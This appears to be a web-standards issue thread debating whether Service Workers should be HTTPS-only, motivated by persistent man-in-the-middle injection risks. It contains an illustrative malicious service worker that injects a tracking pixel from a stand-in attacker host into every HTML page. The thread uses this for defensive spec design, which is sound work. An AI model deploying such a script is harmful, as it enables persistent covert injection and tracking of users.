SSL/TLS Only? #199
What are the arguments for/against as you see them? My view is that it would be a barrier to adoption due to cost and complexity, although that's only off the top of my head.
Only if there's very good reason. It will hurt adoption.
Consider the very basic use case of a coffeeshop that man-in-the-middles every non-encrypted site you visit while in the shop, and uses service workers to inject ads (or 1x1 pixel trackers, or whatever) into your content... forever. Even after you leave the coffee shop, the SW is potentially still installed for every site you visited, and you as a user don't even know whether you're "infected" or not. Yes, we're supposed to re-fetch the SW script every 24 hours, but you can think of lots of workarounds for that. So we need to think through all of those workarounds and figure out a way for the service worker to behave sanely for a legitimate script but still resist a malicious one.

One example: because we're also trying to be resilient against bad network connections and captive portals (so that an app behaves sanely if it tries to update over a bad network), I assume the user agent should keep a cached SW script past 24 hours if the script URL resolves to an HTML page during update (i.e. if you're on a captive portal and all pages are redirected). So now the attacker can choose a URL that it has pre-determined will always return an HTML page, and we never update the SW.
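For concreteness, here is a minimal sketch of the attack being described, assuming the attacker can rewrite plain-HTTP responses for the victim origin while the user is on its network; the file names and the attacker's domain are made up for illustration.

```js
// Injected by the network attacker into any plain-HTTP page on the victim origin:
//
//   <script>
//     if ('serviceWorker' in navigator) {
//       navigator.serviceWorker.register('/evil-sw.js'); // also served by the attacker
//     }
//   </script>

// evil-sw.js: remains registered for that origin after the user leaves the network.
self.addEventListener('fetch', function (event) {
  event.respondWith(
    fetch(event.request).then(function (response) {
      var type = response.headers.get('Content-Type') || '';
      if (type.indexOf('text/html') === -1) {
        return response; // only tamper with HTML
      }
      return response.text().then(function (body) {
        // Inject a tracking pixel (or ads) into every page, indefinitely.
        var poisoned = body.replace(
          '</body>',
          '<img src="https://attacker.example/pixel.gif"></body>'
        );
        return new Response(poisoned, {
          status: response.status,
          headers: { 'Content-Type': 'text/html' }
        });
      });
    })
  );
});
```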
It's the persistence that @alecf mentions that convinces me we need to require HTTPS. Today, if a coffeeshop owner injects ads (or bitcoin computation) into your HTTP pages, those ads go away when you leave the coffeeshop. With SWs, those ads could follow you forever (even shift-refresh won't help if the real site doesn't register a SW of its own). We could imagine auto-unregistering SWs more aggressively in order to limit the damage a malicious captive portal can do, but that's likely to cause problems in other cases. The simplest fix is to require secure transport for the original registration. Service Workers can help reduce the cost of SSL too: since SWs can cache resources, they'll reduce the number of requests to the server, and the lower cost should make it a bit easier for site owners to switch to SSL.
For the offline case where persistence is absolutely required, SSL-only seems right. But cases where persistence isn't really needed seem possible too [this isn't …].
@michael-nordman I think we should examine "cases where persistence isn't needed" one-by-one. The cases I know of are things like push messages, geofencing, and notifications, where there's an even stronger argument to make them HTTPS-only: we and the user need to decide whether to allow these capabilities based on the identity of the site, and that identity is only trustworthy over HTTPS. Do you have an example of an event that you think it's sensible to deliver to a SW loaded via HTTP? Is the value of that event worth complicating the SW spec/implementation?
I don't follow the scenario. I visit Starbucks. Someone injects a SW. 24h later my browser asks for an updated SW, the server returns nothing or a SW of its own. As long as we deal with "nothing" appropriately I do not see the problem. I can totally imagine wanting to browse something like http://krijnhoetmer.nl/irc-logs/ offline and although the trend will be TLS-only, I do not think features should be gated on it.
For comparison:

- With HTTP caching: …
- With AppCache: …
- With ServiceWorker: …

From an …
Actually, the SW attack won't last only 24hrs: the url for the evil SW will 404, and currently that means we retain the current SW. Should we change that? In AppCache, a 404 acts like unregister; should we adopt that?
I think so. When offline it should remain, but on a 404 the domain exists and the script doesn't, so unregistering seems reasonable.
Yeah, implementors are going to have to be very careful here about aggressively unregistering SW scripts. Imagine an app you thought was usable offline suddenly uninstalling itself (removing SW scripts, etc.) because you drove by a Starbucks with a captive portal that 404s every URL until you hit "agree" on their terms of service. I don't think a 404 is a strong enough signal to justify unregistering the script... but again, this issue is solved with https: if the https connection is invalid (rather than a successful http connection with a 404 response), then we know we simply couldn't reach the other end, which is a reasonable proxy for whether or not the network connection is "valid".
Minor issue: the current spec says that ServiceWorkers need to be same-origin to the document. SSL-only would mean that we can't have ServiceWorkers for HTTP apps. I believe you would need a weird rule like: "ServiceWorkers are same-origin, except that the main document, when upgraded to https, counts as same-origin."

But is even that enough? A site may have HTTP apps on "app.com" but support SSL only on "secure.app.com". Other examples: GitHub hosting (foobar.github.io) does not support https. There doesn't seem to be a way to support same-origin + SSL-only Service Workers there: I can find a place to host my ServiceWorker code over SSL, but it can't be same-origin to the GitHub-hosted content.

I will also point out that using bad networks to mount a persistent XSS is not a new threat. See a blog post, Artur Jancic's work (presentation, video), or an academic paper. Of course, no doubt things become a lot worse with ServiceWorkers. Still, maybe it is better to stick to same-origin restrictions and let sites switch to SSL/HSTS if they are worried?
Interesting point about persistent XSS, but I think we can do better with new APIs, and this is a perfect example. The problem isn't that a site opts into using a ServiceWorker over insecure HTTP: this attack lets any man-in-the-middle inject into any web page the user visits, whether or not that site already uses ServiceWorkers, and lets that injection stay permanent. I think this differs from previous threats in that most previous persistent threats still relied on weaknesses in a specific site's use of, say, localStorage. I.e. gmail could have some injection attack on localStorage, but that only affects gmail if gmail had some weakness. This affects every site the user visits on an insecure network, whether or not it is already subject to XSS attacks, and whether or not it uses service workers.
IIUC, browsers have a lot of discretion about when they accept a Service Worker registration, and when they time that SW out of their cache. So even if the spec doesn't require SWs to be served over TLS, each browser can pick policies about how long to save an insecure SW depending on their security team's preferences, possibly as far as deciding that each page load starts completely fresh. @devd, I'll ask some Chrome security folks if they're happy with just a requirement that the main SW script itself is secure, rather than also the page that tells the browser to load it. I believe they want to use attractive new features like SWs as a lever to get more sites onto TLS, but they may be able to point out actual attacks with that weaker requirement too.
Oh, wait, @devd, if the page requesting the SW isn't secure, and the SW is https but on an attacker-controlled domain, you haven't gained anything at all. Yes, the whole app will need to be https. github.io should upgrade.
@alecf See @jakearchibald's comments above. With caching, an attacker can also achieve a long-lived XSS. I apologize: jake's comment is what I should have cited; the links I pointed to are not that directly related. How about we extend the SW design to say "hard refresh clears the SW and fetches it again"? That would bring the vulnerability down to what can already be done with existing caching. @jyasskin Well, one design that could work is "same-origin except for the protocol, which must be https for the SW".
It's unfortunate that github.io doesn't offer HTTPS. devd@, have you filed a bug with them and asked why they don't? [Disregard this portion of the comment, I was confused about the topic under discussion. But leaving for posterity: When the user asks to "keep" a site, the user is making that trust decision based on the identity of the site. HTTPS for both the serving page and service worker makes sure the user gets what she expects from who she expects.]
I am not sure what you mean by "user asks to keep a site." Is there a UI dialog for installing SWs? Did I miss it in the spec? I agree that "HTTPS ensures that the user gets what she expects". But it seems to me that HTTP is still popular; GitHub is just a currently popular example. See Anne's example, http://krijnhoetmer.nl/irc-logs/: it is perfectly reasonable to want to browse that offline. My point was: limiting SW to https means we are limiting the use of SW to HTTPS documents. Are we sure we want that?
Btw, I was wrong: GitHub supports HTTPS for *.github.io. I should have tested before commenting. I apologize! But the last question in the comment above still stands, imho.
A 404 seems sufficient to unregister, to me. Captive portals could be problematic, but only if they are not detected first by the network stack; and then again, having fewer guarantees on HTTP seems okay.
+1
Don't "friendly" captive portals do a cross-domain redirect instead of 404ing? Cross-domain redirects won't be treated as unregister; they'll be an update failure.
@jakearchibald and I have put together a document at https://docs.google.com/document/d/1KWa2TIAtwkaAyFkV9tR6A_6VuoOx5MXGr8UDpF2RwBE/edit?usp=sharing that explains the attack and proposes a set of restrictions on HTTP service workers to mitigate it. I'm planning to send this to our security team to see if they can poke holes in it, but I'd like to get you folks' thoughts/fixes first. You should all be able to comment (please sign in or sign your comments though), and I'll grant edit permissions as I find your email addresses.
I support the move to TLS-only, given the lack of other mitigation methods for these attacks. Also, I find the info in @jakearchibald's comment regarding HTTP cache attacks disturbing. It's probably off topic, but I think we should do something to protect users from that form of attack as well. While moving to TLS-only is not an option for that, IMO, cache revalidation after switching networks might be a proper mitigation. Such revalidation won't be able to rely on ETag/Last-Modified headers, since they can easily be faked as well. Maybe this can be combined with the Subresource Integrity spec in some way. I'll take that up with the WebAppSec people.
@jyasskin it describes only one kind of attack, the "in the clear" captive portal. Some captive portals also redirect SSL traffic (through DNS) and usually present self-signed certificates; this also needs to be addressed. And I am not even talking about injection done on https traffic by entities able to get access to trusted CAs.
Again, the attack would only last at most 24 hours and would only work for sites that cannot be trusted anyway. I'm not convinced.
@annevk we check for updates on navigation and cap max-age at 24 hours. However, if the update check ends with an HTTP 500, a network failure, a cross-origin redirect, or a parse error, we keep the old version. This means an attacker can keep the infected version around longer. I don't want to go HTTPS-only unless we really have to; see https://docs.google.com/document/d/1KWa2TIAtwkaAyFkV9tR6A_6VuoOx5MXGr8UDpF2RwBE/edit for what we'd need to do to mitigate these attacks. (Note: appcache is currently open to most of these attacks.)
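To make the set of outcomes easier to scan, here is a small self-contained sketch of that behaviour as described in the comment above; the outcome names are my own shorthand, not spec terminology.

```js
// Sketch (not spec text) of which update-check results keep the installed
// worker and which replace it, per the behaviour described above.
function updateCheckAction(outcome) {
  switch (outcome) {
    case 'network-failure':         // offline, captive portal with no route, etc.
    case 'http-500':
    case 'cross-origin-redirect':
    case 'parse-error':
      return 'keep-current-worker'; // an attacker's worker survives the failed check
    case 'http-404':
      // The open question earlier in this thread: should this unregister,
      // the way AppCache treats a missing manifest?
      return 'keep-current-worker';
    case 'byte-identical-script':
      return 'keep-current-worker';
    case 'changed-script':
      return 'install-new-version';
    default:
      return 'keep-current-worker';
  }
}

// Example: updateCheckAction('http-404') === 'keep-current-worker'
```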
Another idea (also commented in the doc): for HTTP, could we require the ServiceWorker script (and its imports) to match what a trusted server sees at that url? E.g., Chrome fetches the SW script, then asks a Google server for a hash of what it sees at that url. If the hashes do not match, no install. This means you couldn't internationalise/personalise your SW. If you want to do that, go HTTPS.
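Purely as an illustration of that idea (nothing here exists today): the browser-side check might look roughly like this, with the verification endpoint and its response format entirely made up.

```js
// Hypothetical browser-side check for an HTTP-served service worker script:
// compare a hash of the fetched script with what a trusted verifier sees.
// 'sw-verifier.example' and its JSON response shape are invented for this sketch.
async function installAllowedOverHttp(scriptURL, scriptBody) {
  const digest = await crypto.subtle.digest(
    'SHA-256',
    new TextEncoder().encode(scriptBody)
  );
  const localHash = bufferToHex(digest);

  const res = await fetch(
    'https://sw-verifier.example/hash?url=' + encodeURIComponent(scriptURL)
  );
  const { hash: trustedHash } = await res.json();

  // Any mismatch (a personalised, internationalised, or tampered script) blocks install.
  return localHash === trustedHash;
}

function bufferToHex(buffer) {
  return Array.from(new Uint8Array(buffer))
    .map(function (b) { return b.toString(16).padStart(2, '0'); })
    .join('');
}
```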
That sounds like overkill to me. Again, HTTP-only should only be considered for trivial sites anyway. Anyone who builds something complicated that needs to be trusted cannot use HTTP-only anyway.
I'm worried about sites like the BBC & Guardian, where the user trusts the content. (But yes, these sites are already vulnerable through appcache.)
Anything served over HTTP is vulnerable to MitM attacks, and can’t be trusted by any user. If the BBC / The Guardian value security of their users they should really start to use HTTPS (regardless of whether appcache/SW comes into play).
They’re vulnerable to MitM attacks in general. I agree with @annevk.
@mathiasbynens One reason the security folks want to make new platform features HTTPS-only is that the BBC/Guardian demonstrably don't care about the security of their users in this way, but they're likely to care about the speed their pages load. By tying faster page loads to secure connections, even artificially, we can improve users' security. Trivial sites that don't need Service Workers could stay on HTTP, but non-trivial sites would need to move to HTTPS, as @annevk suggested. However, I also sympathize with the objections to tying things together artificially like that, which is why we put together the document about how to mitigate the more concrete problems with SWs over HTTP.
It could help TLS adoption, though, if new Web features were https-only. I can see the point that it's not cool to hold other features hostage in order to drive https adoption, but when a feature needs special mitigations in order not to be a disaster without https, I think it's fair to make the feature https-only. Also, it seems implausible that sites whose developers would be competent enough to deploy ServiceWorkers wouldn't be competent enough to deploy https. HTTP cache attacks and AppCache attacks are not a good reason to introduce more attack surface of similar nature.
What about localhost? Or the file: scheme? Should these not be allowed to use ServiceWorkers because they don't have TLS? I see it as a step backwards...
Depending on how a ServiceWorker's caches work (I wasn't able to find details, if they've even been nailed down yet), I can imagine another potential issue with http and captive portals. Say we already have a SW installed for example.com and open it again while behind a perfectly well-behaved captive portal. We load example.com, get the shell of the app from cache, never touch the network, the app works offline, all is well. Then something needs to hit the network and the SW decides to save it in some cache. What happens when the captive portal hijacks that request? If the captive portal is well-behaved, hopefully it sends sufficient Cache-Control headers to avoid poisoning the cache, but if the SW cache doesn't use HTTP caching semantics, the hijacked response might stick.
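As a sketch of that failure mode, assuming a service worker that naively caches whatever the network returns (the cache name here is arbitrary):

```js
// Naive runtime caching: whatever the network returns gets stored, including a
// captive portal's interception page served with a 200 for the hijacked URL.
self.addEventListener('fetch', function (event) {
  if (event.request.method !== 'GET') return; // let non-GET requests fall through

  event.respondWith(
    caches.open('runtime-v1').then(function (cache) {
      return fetch(event.request).then(function (response) {
        cache.put(event.request, response.clone()); // may poison the cache
        return response;
      });
    })
  );
});
```

Since the Cache API stores whatever you put in it and does not apply HTTP freshness semantics when matching, even a portal that sends conservative Cache-Control headers could end up with its login page stored for the hijacked URL; at minimum a handler like this would need to check `response.ok` (and probably the response URL) before calling `cache.put`.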
hey all, there's been a ton of good debate in this thread. The face-to-face meeting at Mozilla today included Patrick McManus (who is helping to design HTTP 2.0). The design points appear to be: …
The arguments for SSL include: …
The provisional decision is to make Service Workers HTTPS-only. We'll see how the beta period goes. If we have to walk it back, we'll need to add many mitigations to the HTTP mode. At some level, this is the smallest intervention needed to get good security and developer usability.
This provisional decision still includes the localhost exception, right? What about custom domains that resolve to localhost? For example, I put …
Yes. DevTools are encouraged to allow disabling of the HTTPS-only restriction.
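For local development, a common page-side pattern (a sketch, not anything mandated by the spec; the host list is an assumption) is to register only on HTTPS or on well-known loopback hosts:

```js
// Only register when the page is HTTPS or served from a loopback host.
var isLoopback = ['localhost', '127.0.0.1', '[::1]'].indexOf(location.hostname) !== -1;

if ('serviceWorker' in navigator &&
    (location.protocol === 'https:' || isLoopback)) {
  navigator.serviceWorker.register('/sw.js').catch(function (err) {
    console.log('ServiceWorker registration failed:', err);
  });
}
```

A custom domain that merely resolves to 127.0.0.1 would fail a hostname check like this, which is why a browser-level escape hatch (e.g. a DevTools toggle) matters for that case.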
Sorry to jump on this thread rather late, and what I have to say probably doesn't affect the outcome but...
I just checked this, and it doesn't seem to be true: it seems like if you return a 404 for a manifest, then AppCache aborts the update process and sticks with the set of files it already has. (I agree that this should be the behaviour though, especially if https isn't enforced for SW: it would be sensible for a 404 to trigger the unregistration of both ServiceWorker and AppCache. But other similar status codes, e.g. 5xx or other 4xx, probably shouldn't cause this to happen.) Also, because there is (as far as I know) no way to unregister an AppCache right now, the upgrade process from AppCache to ServiceWorker is really difficult. Whilst there isn't a huge amount of adoption of AppCache, there is some. Have I missed something, or is it worth considering adding something to the spec to explicitly disable AppCache if a ServiceWorker is installed? (Or, better, just changing AppCache's spec so that it gets automatically uninstalled if its manifest returns a 404, or is that something we can't do/shouldn't discuss here?)
Really? Does it continue to use the cache on refresh? This isn't what the spec says (http://www.whatwg.org/specs/web-apps/current-work/multipage/offline.html#downloading-or-updating-an-application-cache - see step 5).
Oops. You're right. Test case was flawed :)
Clobbering on 404 is just a bad idea. It massively complicates … The interop scenario is still relatively undecided. I think we should open a separate issue for that.
I've outlined a possible mitigation for the "MITMed SW" scenario on WebAppSec.
There's strong feeling on the Chrome team that (with a localhost exception) Service Workers should be SSL-only.
What say we?